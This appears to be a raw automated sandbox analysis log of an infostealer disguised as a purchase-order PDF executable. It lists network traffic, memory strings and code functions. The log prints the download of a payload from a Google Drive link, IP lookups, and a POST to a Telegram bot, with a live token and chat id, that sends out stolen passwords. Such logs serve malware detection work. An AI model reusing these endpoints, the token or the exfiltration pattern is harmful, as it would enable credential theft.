            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49738 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd200fa9571766Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org(-
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BCF000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3314213089.00000000354E1000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3314213089.00000000354E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/O5
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3291661247.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344704547.0000000002614000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344614634.00000000025E5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025CD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG&export=download
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344704547.0000000002614000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344614634.00000000025E5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/xs
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe
            Source: initial sampleStatic PE information: Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic file information: Suspicious name
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_004070413_2_00407041
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_0040686A3_2_0040686A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00404B303_2_00404B30
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_001543283_2_00154328
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00158DA03_2_00158DA0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_001559683_2_00155968
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00155F903_2_00155F90
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00152DD13_2_00152DD1
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B303AF3_2_32B303AF
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B353283_2_32B35328
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3331A3_2_32B3331A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3C6383_2_32B3C638
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B376283_2_32B37628
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3CCA03_2_32B3CCA0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3DA9C3_2_32B3DA9C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3AAEA3_2_32B3AAEA
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3EBF73_2_32B3EBF7
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3E3393_2_32B3E339
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B36B013_2_32B36B01
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3B07F3_2_32B3B07F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3F0423_2_32B3F042
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B378483_2_32B37848
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3C1E03_2_32B3C1E0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3B9303_2_32B3B930
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B36EA03_2_32B36EA0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3DEE13_2_32B3DEE1
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3E79F3_2_32B3E79F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3A7333_2_32B3A733
